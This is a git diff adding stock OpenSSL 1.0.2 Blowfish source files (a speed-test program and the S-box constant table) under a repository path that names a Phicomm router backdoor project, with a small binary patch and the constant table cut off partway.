index 0000000000000000000000000000000000000000..12593ba6b934cb9f8e4072b0e4a38294268b3b91
GIT binary patch
literal 1912
zcmbu9%}*0S6u_q+e5klog9!#DJycU8Y__z~!hv)OEdwc%K&uDEO<Rf(Xd&%30Yj98
zU|cKef8o_Xfdq)e0|zf2JbE#~iy<b)sOx*XGxWpdqA!_wZ+`RMyw{nxeH=@~oel>P
z;vj>hx)PL-u)AtUOfy2xk~VVG-u;8#8Pz|~+vEBHO^xcmXmVWNO)>r36x;a1XvIS-
z7iU<-eZ>!POds}z1KYF`akH&8pTGT`p2WF*A2xc-IW)HA9*hMH*ig{DmGv+BTD8f|
zkL4iK515|tbyDLk)7N~S&sa(YPGA+FtOCe9Q32LtS|OG_qR&!<8GFV~UoxbO8haa`
zTArqi!`HD*L%V>{70eAaP`$%PA*Gw@-3(xOh6Sy<wI(wa+t_7yr|CU9P4826hl~sj
z4S4;jOu3+yz5Q}fR(b<B%jPohs85lV&@~I2R|XSaqX$M4jFDR@;v{4nnF|I=hoy+)
z;UsaacpP1AEv>KMK@z|(@x9-u<C5p4GbVMuaK$9=mOCc-pEnIl%9G|{DZJ4#EUi17
z@1-!66e{_nk~b=KMkP;FYUO8~r10(C<f~z~@3QR-tX))JALTNCZ9T)4i!}cYP2O?>
zx3Ah|-eP@78!XS))M?%ou*)#;-Ww$dz>W`|z)5CSU7F3@2+3Izja#OgD`bnS%NkKf
z5))CHP$%N?saR4?(r6;4qT8{9TGG<l1vNXjpw6b}7YSMC1z``If$`I@<gkY0ZxY<g
zIrI(oPF3X6YF<lch+NW&mYx$<F}IkOwcLtE<e9XVCUT}!B64;qpU)M56_&J|487QE
z*2dQl3T1h@xU`%rYO6#xPsq)wv&D2iSIzk!mKS2N*BUz^0t`jGo3*lhg^juk2Hsf&
zMy;&#R#Z4V4I1-^4(jCmD(8)zJBZFU(ujM&2haT1_yEM>nW9cGO%eI83&6F=FZ2L#
zVb{9O+d&)OF<|($)%6gpmwCJw>{=1`Cs+mybZv~s|0<L@OC8UR@zbzl_kM5qg^G8=
z_rq8bFSuQ9O!l4U4|9#*)G3>IWQ}hJh$tLR;G#zOamVBwSa$LI9KxqvCynuc0P$Sc
A-2eap

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_opts.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_opts.c
new file mode 100644
index 0000000..f85495c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_opts.c
@@ -0,0 +1,324 @@
+/* crypto/bf/bf_opts.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * define PART1, PART2, PART3 or PART4 to build only with a few of the
+ * options. This is for machines with 64k code segment size restrictions.
+ */
+
+#if !defined(OPENSSL_SYS_MSDOS) && (!defined(OPENSSL_SYS_VMS) || defined(__DECC)) && !defined(OPENSSL_SYS_MACOSX)
+# define TIMES
+#endif
+
+#include <stdio.h>
+
+#include <openssl/e_os2.h>
+#include OPENSSL_UNISTD_IO
+OPENSSL_DECLARE_EXIT
+#ifndef OPENSSL_SYS_NETWARE
+# include <signal.h>
+#endif
+#ifndef _IRIX
+# include <time.h>
+#endif
+#ifdef TIMES
+# include <sys/types.h>
+# include <sys/times.h>
+#endif
+    /*
+     * Depending on the VMS version, the tms structure is perhaps defined.
+     * The __TMS macro will show if it was.  If it wasn't defined, we should
+     * undefine TIMES, since that tells the rest of the program how things
+     * should be handled.  -- Richard Levitte
+     */
+#if defined(OPENSSL_SYS_VMS_DECC) && !defined(__TMS)
+# undef TIMES
+#endif
+#ifndef TIMES
+# include <sys/timeb.h>
+#endif
+#if defined(sun) || defined(__ultrix)
+# define _POSIX_SOURCE
+# include <limits.h>
+# include <sys/param.h>
+#endif
+#include <openssl/blowfish.h>
+#define BF_DEFAULT_OPTIONS
+#undef BF_ENC
+#define BF_encrypt  BF_encrypt_normal
+#undef HEADER_BF_LOCL_H
+#include "bf_enc.c"
+#define BF_PTR
+#undef BF_PTR2
+#undef BF_ENC
+#undef BF_encrypt
+#define BF_encrypt  BF_encrypt_ptr
+#undef HEADER_BF_LOCL_H
+#include "bf_enc.c"
+#undef BF_PTR
+#define BF_PTR2
+#undef BF_ENC
+#undef BF_encrypt
+#define BF_encrypt  BF_encrypt_ptr2
+#undef HEADER_BF_LOCL_H
+#include "bf_enc.c"
+/* The following if from times(3) man page.  It may need to be changed */
+#ifndef HZ
+# ifndef CLK_TCK
+#  ifndef _BSD_CLK_TCK_         /* FreeBSD fix */
+#   define HZ   100.0
+#  else                         /* _BSD_CLK_TCK_ */
+#   define HZ ((double)_BSD_CLK_TCK_)
+#  endif
+# else                          /* CLK_TCK */
+#  define HZ ((double)CLK_TCK)
+# endif
+#endif
+#define BUFSIZE ((long)1024)
+long run = 0;
+
+double Time_F(int s);
+#ifdef SIGALRM
+# if defined(__STDC__) || defined(sgi)
+#  define SIGRETTYPE void
+# else
+#  define SIGRETTYPE int
+# endif
+
+SIGRETTYPE sig_done(int sig);
+SIGRETTYPE sig_done(int sig)
+{
+    signal(SIGALRM, sig_done);
+    run = 0;
+# ifdef LINT
+    sig = sig;
+# endif
+}
+#endif
+
+#define START   0
+#define STOP    1
+
+double Time_F(int s)
+{
+    double ret;
+#ifdef TIMES
+    static struct tms tstart, tend;
+
+    if (s == START) {
+        times(&tstart);
+        return (0);
+    } else {
+        times(&tend);
+        ret = ((double)(tend.tms_utime - tstart.tms_utime)) / HZ;
+        return ((ret == 0.0) ? 1e-6 : ret);
+    }
+#else                           /* !times() */
+    static struct timeb tstart, tend;
+    long i;
+
+    if (s == START) {
+        ftime(&tstart);
+        return (0);
+    } else {
+        ftime(&tend);
+        i = (long)tend.millitm - (long)tstart.millitm;
+        ret = ((double)(tend.time - tstart.time)) + ((double)i) / 1000.0;
+        return ((ret == 0.0) ? 1e-6 : ret);
+    }
+#endif
+}
+
+#ifdef SIGALRM
+# define print_name(name) fprintf(stderr,"Doing %s's for 10 seconds\n",name); alarm(10);
+#else
+# define print_name(name) fprintf(stderr,"Doing %s %ld times\n",name,cb);
+#endif
+
+#define time_it(func,name,index) \
+        print_name(name); \
+        Time_F(START); \
+        for (count=0,run=1; COND(cb); count+=4) \
+                { \
+                unsigned long d[2]; \
+                func(d,&sch); \
+                func(d,&sch); \
+                func(d,&sch); \
+                func(d,&sch); \
+                } \
+        tm[index]=Time_F(STOP); \
+        fprintf(stderr,"%ld %s's in %.2f second\n",count,name,tm[index]); \
+        tm[index]=((double)COUNT(cb))/tm[index];
+
+#define print_it(name,index) \
+        fprintf(stderr,"%s bytes per sec = %12.2f (%5.1fuS)\n",name, \
+                tm[index]*8,1.0e6/tm[index]);
+
+int main(int argc, char **argv)
+{
+    long count;
+    static unsigned char buf[BUFSIZE];
+    static char key[16] = { 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0,
+        0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0
+    };
+    BF_KEY sch;
+    double d, tm[16], max = 0;
+    int rank[16];
+    char *str[16];
+    int max_idx = 0, i, num = 0, j;
+#ifndef SIGALARM
+    long ca, cb, cc, cd, ce;
+#endif
+
+    for (i = 0; i < 12; i++) {
+        tm[i] = 0.0;
+        rank[i] = 0;
+    }
+
+#ifndef TIMES
+    fprintf(stderr, "To get the most accurate results, try to run this\n");
+    fprintf(stderr, "program when this computer is idle.\n");
+#endif
+
+    BF_set_key(&sch, 16, key);
+
+#ifndef SIGALRM
+    fprintf(stderr, "First we calculate the approximate speed ...\n");
+    count = 10;
+    do {
+        long i;
+        unsigned long data[2];
+
+        count *= 2;
+        Time_F(START);
+        for (i = count; i; i--)
+            BF_encrypt(data, &sch);
+        d = Time_F(STOP);
+    } while (d < 3.0);
+    ca = count;
+    cb = count * 3;
+    cc = count * 3 * 8 / BUFSIZE + 1;
+    cd = count * 8 / BUFSIZE + 1;
+
+    ce = count / 20 + 1;
+# define COND(d) (count != (d))
+# define COUNT(d) (d)
+#else
+# define COND(c) (run)
+# define COUNT(d) (count)
+    signal(SIGALRM, sig_done);
+    alarm(10);
+#endif
+
+    time_it(BF_encrypt_normal, "BF_encrypt_normal ", 0);
+    time_it(BF_encrypt_ptr, "BF_encrypt_ptr    ", 1);
+    time_it(BF_encrypt_ptr2, "BF_encrypt_ptr2   ", 2);
+    num += 3;
+
+    str[0] = "<nothing>";
+    print_it("BF_encrypt_normal ", 0);
+    max = tm[0];
+    max_idx = 0;
+    str[1] = "ptr      ";
+    print_it("BF_encrypt_ptr ", 1);
+    if (max < tm[1]) {
+        max = tm[1];
+        max_idx = 1;
+    }
+    str[2] = "ptr2     ";
+    print_it("BF_encrypt_ptr2 ", 2);
+    if (max < tm[2]) {
+        max = tm[2];
+        max_idx = 2;
+    }
+
+    printf("options    BF ecb/s\n");
+    printf("%s %12.2f 100.0%%\n", str[max_idx], tm[max_idx]);
+    d = tm[max_idx];
+    tm[max_idx] = -2.0;
+    max = -1.0;
+    for (;;) {
+        for (i = 0; i < 3; i++) {
+            if (max < tm[i]) {
+                max = tm[i];
+                j = i;
+            }
+        }
+        if (max < 0.0)
+            break;
+        printf("%s %12.2f  %4.1f%%\n", str[j], tm[j], tm[j] / d * 100.0);
+        tm[j] = -2.0;
+        max = -1.0;
+    }
+
+    switch (max_idx) {
+    case 0:
+        printf("-DBF_DEFAULT_OPTIONS\n");
+        break;
+    case 1:
+        printf("-DBF_PTR\n");
+        break;
+    case 2:
+        printf("-DBF_PTR2\n");
+        break;
+    }
+    exit(0);
+#if defined(LINT) || defined(OPENSSL_SYS_MSDOS)
+    return (0);
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_pi.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_pi.h
new file mode 100644
index 0000000..46a2673
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_pi.h
@@ -0,0 +1,579 @@
+/* crypto/bf/bf_pi.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+static const BF_KEY bf_init = {
+    {
+     0x243f6a88L, 0x85a308d3L, 0x13198a2eL, 0x03707344L,
+     0xa4093822L, 0x299f31d0L, 0x082efa98L, 0xec4e6c89L,
+     0x452821e6L, 0x38d01377L, 0xbe5466cfL, 0x34e90c6cL,
+     0xc0ac29b7L, 0xc97c50ddL, 0x3f84d5b5L, 0xb5470917L,
+     0x9216d5d9L, 0x8979fb1b}, {
+                                0xd1310ba6L, 0x98dfb5acL, 0x2ffd72dbL,
+                                0xd01adfb7L,
+                                0xb8e1afedL, 0x6a267e96L, 0xba7c9045L,
+                                0xf12c7f99L,
+                                0x24a19947L, 0xb3916cf7L, 0x0801f2e2L,
+                                0x858efc16L,
+                                0x636920d8L, 0x71574e69L, 0xa458fea3L,
+                                0xf4933d7eL,
+                                0x0d95748fL, 0x728eb658L, 0x718bcd58L,
+                                0x82154aeeL,
+                                0x7b54a41dL, 0xc25a59b5L, 0x9c30d539L,
+                                0x2af26013L,
+                                0xc5d1b023L, 0x286085f0L, 0xca417918L,
+                                0xb8db38efL,
+                                0x8e79dcb0L, 0x603a180eL, 0x6c9e0e8bL,
+                                0xb01e8a3eL,
+                                0xd71577c1L, 0xbd314b27L, 0x78af2fdaL,
+                                0x55605c60L,
+                                0xe65525f3L, 0xaa55ab94L, 0x57489862L,
+                                0x63e81440L,
+                                0x55ca396aL, 0x2aab10b6L, 0xb4cc5c34L,
+                                0x1141e8ceL,
+                                0xa15486afL, 0x7c72e993L, 0xb3ee1411L,
+                                0x636fbc2aL,
+                                0x2ba9c55dL, 0x741831f6L, 0xce5c3e16L,
+                                0x9b87931eL,
+                                0xafd6ba33L, 0x6c24cf5cL, 0x7a325381L,
+                                0x28958677L,
+                                0x3b8f4898L, 0x6b4bb9afL, 0xc4bfe81bL,
+                                0x66282193L,
+                                0x61d809ccL, 0xfb21a991L, 0x487cac60L,
+                                0x5dec8032L,
+                                0xef845d5dL, 0xe98575b1L, 0xdc262302L,
+                                0xeb651b88L,
+                                0x23893e81L, 0xd396acc5L, 0x0f6d6ff3L,
+                                0x83f44239L,
+                                0x2e0b4482L, 0xa4842004L, 0x69c8f04aL,
+                                0x9e1f9b5eL,
+                                0x21c66842L, 0xf6e96c9aL, 0x670c9c61L,
+                                0xabd388f0L,
+                                0x6a51a0d2L, 0xd8542f68L, 0x960fa728L,
+                                0xab5133a3L,
+                                0x6eef0b6cL, 0x137a3be4L, 0xba3bf050L,
+                                0x7efb2a98L,
+                                0xa1f1651dL, 0x39af0176L, 0x66ca593eL,
+                                0x82430e88L,
+                                0x8cee8619L, 0x456f9fb4L, 0x7d84a5c3L,
+                                0x3b8b5ebeL,
+                                0xe06f75d8L, 0x85c12073L, 0x401a449fL,
+                                0x56c16aa6L,
+                                0x4ed3aa62L, 0x363f7706L, 0x1bfedf72L,
+                                0x429b023dL,
+                                0x37d0d724L, 0xd00a1248L, 0xdb0fead3L,
+                                0x49f1c09bL,
+                                0x075372c9L, 0x80991b7bL, 0x25d479d8L,
+                                0xf6e8def7L,
+                                0xe3fe501aL, 0xb6794c3bL, 0x976ce0bdL,
+                                0x04c006baL,
+                                0xc1a94fb6L, 0x409f60c4L, 0x5e5c9ec2L,
+                                0x196a2463L,
+                                0x68fb6fafL, 0x3e6c53b5L, 0x1339b2ebL,
+                                0x3b52ec6fL,
+                                0x6dfc511fL, 0x9b30952cL, 0xcc814544L,
+                                0xaf5ebd09L,
+                                0xbee3d004L, 0xde334afdL, 0x660f2807L,
+                                0x192e4bb3L,
+                                0xc0cba857L, 0x45c8740fL, 0xd20b5f39L,
+                                0xb9d3fbdbL,
+                                0x5579c0bdL, 0x1a60320aL, 0xd6a100c6L,
+                                0x402c7279L,
+                                0x679f25feL, 0xfb1fa3ccL, 0x8ea5e9f8L,
+                                0xdb3222f8L,
+                                0x3c7516dfL, 0xfd616b15L, 0x2f501ec8L,
+                                0xad0552abL,
+                                0x323db5faL, 0xfd238760L, 0x53317b48L,
+                                0x3e00df82L,
+                                0x9e5c57bbL, 0xca6f8ca0L, 0x1a87562eL,
+                                0xdf1769dbL,
+                                0xd542a8f6L, 0x287effc3L, 0xac6732c6L,
+                                0x8c4f5573L,
+                                0x695b27b0L, 0xbbca58c8L, 0xe1ffa35dL,
+                                0xb8f011a0L,
+                                0x10fa3d98L, 0xfd2183b8L, 0x4afcb56cL,
+                                0x2dd1d35bL,
+                                0x9a53e479L, 0xb6f84565L, 0xd28e49bcL,
+                                0x4bfb9790L,
+                                0xe1ddf2daL, 0xa4cb7e33L, 0x62fb1341L,
+                                0xcee4c6e8L,
+                                0xef20cadaL, 0x36774c01L, 0xd07e9efeL,
+                                0x2bf11fb4L,
+                                0x95dbda4dL, 0xae909198L, 0xeaad8e71L,
+                                0x6b93d5a0L,
+                                0xd08ed1d0L, 0xafc725e0L, 0x8e3c5b2fL,
+                                0x8e7594b7L,
+                                0x8ff6e2fbL, 0xf2122b64L, 0x8888b812L,
+                                0x900df01cL,
+                                0x4fad5ea0L, 0x688fc31cL, 0xd1cff191L,
+                                0xb3a8c1adL,
+                                0x2f2f2218L, 0xbe0e1777L, 0xea752dfeL,
+                                0x8b021fa1L,
+                                0xe5a0cc0fL, 0xb56f74e8L, 0x18acf3d6L,
+                                0xce89e299L,
+                                0xb4a84fe0L, 0xfd13e0b7L, 0x7cc43b81L,
+                                0xd2ada8d9L,
+                                0x165fa266L, 0x80957705L, 0x93cc7314L,
+                                0x211a1477L,
+                                0xe6ad2065L, 0x77b5fa86L, 0xc75442f5L,
+                                0xfb9d35cfL,
+                                0xebcdaf0cL, 0x7b3e89a0L, 0xd6411bd3L,
+                                0xae1e7e49L,
+                                0x00250e2dL, 0x2071b35eL, 0x226800bbL,
+                                0x57b8e0afL,
+                                0x2464369bL, 0xf009b91eL, 0x5563911dL,
+                                0x59dfa6aaL,
+                                0x78c14389L, 0xd95a537fL, 0x207d5ba2L,
+                                0x02e5b9c5L,
+                                0x83260376L, 0x6295cfa9L, 0x11c81968L,
+                                0x4e734a41L,
+                                0xb3472dcaL, 0x7b14a94aL, 0x1b510052L,
+                                0x9a532915L,
+                                0xd60f573fL, 0xbc9bc6e4L, 0x2b60a476L,
+                                0x81e67400L,
+                                0x08ba6fb5L, 0x571be91fL, 0xf296ec6bL,
+                                0x2a0dd915L,
+                                0xb6636521L, 0xe7b9f9b6L, 0xff34052eL,
+                                0xc5855664L,
+                                0x53b02d5dL, 0xa99f8fa1L, 0x08ba4799L,
+                                0x6e85076aL,
+                                0x4b7a70e9L, 0xb5b32944L, 0xdb75092eL,
+                                0xc4192623L,
+                                0xad6ea6b0L, 0x49a7df7dL, 0x9cee60b8L,
+                                0x8fedb266L,
+                                0xecaa8c71L, 0x699a17ffL, 0x5664526cL,
+                                0xc2b19ee1L,
+                                0x193602a5L, 0x75094c29L, 0xa0591340L,
+                                0xe4183a3eL,
+                                0x3f54989aL, 0x5b429d65L, 0x6b8fe4d6L,
+                                0x99f73fd6L,
+                                0xa1d29c07L, 0xefe830f5L, 0x4d2d38e6L,
+                                0xf0255dc1L,
+                                0x4cdd2086L, 0x8470eb26L, 0x6382e9c6L,
+                                0x021ecc5eL,
+                                0x09686b3fL, 0x3ebaefc9L, 0x3c971814L,
+                                0x6b6a70a1L,
+                                0x687f3584L, 0x52a0e286L, 0xb79c5305L,
+                                0xaa500737L,
+                                0x3e07841cL, 0x7fdeae5cL, 0x8e7d44ecL,
+                                0x5716f2b8L,
+                                0xb03ada37L, 0xf0500c0dL, 0xf01c1f04L,
+                                0x0200b3ffL,
+                                0xae0cf51aL, 0x3cb574b2L, 0x25837a58L,
+                                0xdc0921bdL,
+                                0xd19113f9L, 0x7ca92ff6L, 0x94324773L,
+                                0x22f54701L,
+                                0x3ae5e581L, 0x37c2dadcL, 0xc8b57634L,
+                                0x9af3dda7L,
+                                0xa9446146L, 0x0fd0030eL, 0xecc8c73eL,
+                                0xa4751e41L,
+                                0xe238cd99L, 0x3bea0e2fL, 0x3280bba1L,
+                                0x183eb331L,
+                                0x4e548b38L, 0x4f6db908L, 0x6f420d03L,
+                                0xf60a04bfL,
+                                0x2cb81290L, 0x24977c79L, 0x5679b072L,
+                                0xbcaf89afL,
+                                0xde9a771fL, 0xd9930810L, 0xb38bae12L,
+                                0xdccf3f2eL,
+                                0x5512721fL, 0x2e6b7124L, 0x501adde6L,
+                                0x9f84cd87L,
+                                0x7a584718L, 0x7408da17L, 0xbc9f9abcL,
+                                0xe94b7d8cL,
+                                0xec7aec3aL, 0xdb851dfaL, 0x63094366L,
+                                0xc464c3d2L,
+                                0xef1c1847L, 0x3215d908L, 0xdd433b37L,
+                                0x24c2ba16L,
+                                0x12a14d43L, 0x2a65c451L, 0x50940002L,
+                                0x133ae4ddL,
+                                0x71dff89eL, 0x10314e55L, 0x81ac77d6L,
+                                0x5f11199bL,
+                                0x043556f1L, 0xd7a3c76bL, 0x3c11183bL,
+                                0x5924a509L,
+                                0xf28fe6edL, 0x97f1fbfaL, 0x9ebabf2cL,
+                                0x1e153c6eL,
+                                0x86e34570L, 0xeae96fb1L, 0x860e5e0aL,
+                                0x5a3e2ab3L,
+                                0x771fe71cL, 0x4e3d06faL, 0x2965dcb9L,
+                                0x99e71d0fL,
+                                0x803e89d6L, 0x5266c825L, 0x2e4cc978L,
+                                0x9c10b36aL,
+                                0xc6150ebaL, 0x94e2ea78L, 0xa5fc3c53L,
+                                0x1e0a2df4L,
+                                0xf2f74ea7L, 0x361d2b3dL, 0x1939260fL,
+                                0x19c27960L,
+                                0x5223a708L, 0xf71312b6L, 0xebadfe6eL,
+                                0xeac31f66L,
+                                0xe3bc4595L, 0xa67bc883L, 0xb17f37d1L,
+                                0x018cff28L,
+                                0xc332ddefL, 0xbe6c5aa5L, 0x65582185L,
+                                0x68ab9802L,
+                                0xeecea50fL, 0xdb2f953bL, 0x2aef7dadL,
+                                0x5b6e2f84L,
+                                0x1521b628L, 0x29076170L, 0xecdd4775L,
+                                0x619f1510L,
+                                0x13cca830L, 0xeb61bd96L, 0x0334fe1eL,
+                                0xaa0363cfL,
+                                0xb5735c90L, 0x4c70a239L, 0xd59e9e0bL,
+                                0xcbaade14L,
+                                0xeecc86bcL, 0x60622ca7L, 0x9cab5cabL,
+                                0xb2f3846eL,
+                                0x648b1eafL, 0x19bdf0caL, 0xa02369b9L,
+                                0x655abb50L,
+                                0x40685a32L, 0x3c2ab4b3L, 0x319ee9d5L,
+                                0xc021b8f7L,
+                                0x9b540b19L, 0x875fa099L, 0x95f7997eL,
+                                0x623d7da8L,
+                                0xf837889aL, 0x97e32d77L, 0x11ed935fL,
+                                0x16681281L,
+                                0x0e358829L, 0xc7e61fd6L, 0x96dedfa1L,
+                                0x7858ba99L,
+                                0x57f584a5L, 0x1b227263L, 0x9b83c3ffL,
+                                0x1ac24696L,
+                                0xcdb30aebL, 0x532e3054L, 0x8fd948e4L,
+                                0x6dbc3128L,
+                                0x58ebf2efL, 0x34c6ffeaL, 0xfe28ed61L,
+                                0xee7c3c73L,
+                                0x5d4a14d9L, 0xe864b7e3L, 0x42105d14L,
+                                0x203e13e0L,
+                                0x45eee2b6L, 0xa3aaabeaL, 0xdb6c4f15L,
+                                0xfacb4fd0L,
+                                0xc742f442L, 0xef6abbb5L, 0x654f3b1dL,
+                                0x41cd2105L,
+                                0xd81e799eL, 0x86854dc7L, 0xe44b476aL,
+                                0x3d816250L,
+                                0xcf62a1f2L, 0x5b8d2646L, 0xfc8883a0L,
+                                0xc1c7b6a3L,
+                                0x7f1524c3L, 0x69cb7492L, 0x47848a0bL,
+                                0x5692b285L,
+                                0x095bbf00L, 0xad19489dL, 0x1462b174L,
+                                0x23820e00L,
+                                0x58428d2aL, 0x0c55f5eaL, 0x1dadf43eL,
+                                0x233f7061L,
+                                0x3372f092L, 0x8d937e41L, 0xd65fecf1L,
+                                0x6c223bdbL,
+                                0x7cde3759L, 0xcbee7460L, 0x4085f2a7L,
+                                0xce77326eL,
+                                0xa6078084L, 0x19f8509eL, 0xe8efd855L,
+                                0x61d99735L,
+                                0xa969a7aaL, 0xc50c06c2L, 0x5a04abfcL,
+                                0x800bcadcL,
+                                0x9e447a2eL, 0xc3453484L, 0xfdd56705L,
+                                0x0e1e9ec9L,
+                                0xdb73dbd3L, 0x105588cdL, 0x675fda79L,
+                                0xe3674340L,
+                                0xc5c43465L, 0x713e38d8L, 0x3d28f89eL,
+                                0xf16dff20L,
+                                0x153e21e7L, 0x8fb03d4aL, 0xe6e39f2bL,
+                                0xdb83adf7L,
+                                0xe93d5a68L, 0x948140f7L, 0xf64c261cL,
+                                0x94692934L,
+                                0x411520f7L, 0x7602d4f7L, 0xbcf46b2eL,
+                                0xd4a20068L,
+                                0xd4082471L, 0x3320f46aL, 0x43b7d4b7L,
+                                0x500061afL,
+                                0x1e39f62eL, 0x97244546L, 0x14214f74L,
+                                0xbf8b8840L,
+                                0x4d95fc1dL, 0x96b591afL, 0x70f4ddd3L,
+                                0x66a02f45L,
+                                0xbfbc09ecL, 0x03bd9785L, 0x7fac6dd0L,
+                                0x31cb8504L,
+                                0x96eb27b3L, 0x55fd3941L, 0xda2547e6L,
+                                0xabca0a9aL,
+                                0x28507825L, 0x530429f4L, 0x0a2c86daL,
+                                0xe9b66dfbL,
+                                0x68dc1462L, 0xd7486900L, 0x680ec0a4L,
+                                0x27a18deeL,
+                                0x4f3ffea2L, 0xe887ad8cL, 0xb58ce006L,
+                                0x7af4d6b6L,
+                                0xaace1e7cL, 0xd3375fecL, 0xce78a399L,
+                                0x406b2a42L,
+                                0x20fe9e35L, 0xd9f385b9L, 0xee39d7abL,
+                                0x3b124e8bL,
+                                0x1dc9faf7L, 0x4b6d1856L, 0x26a36631L,
+                                0xeae397b2L,
+                                0x3a6efa74L, 0xdd5b4332L, 0x6841e7f7L,
+                                0xca7820fbL,
+                                0xfb0af54eL, 0xd8feb397L, 0x454056acL,
+                                0xba489527L,
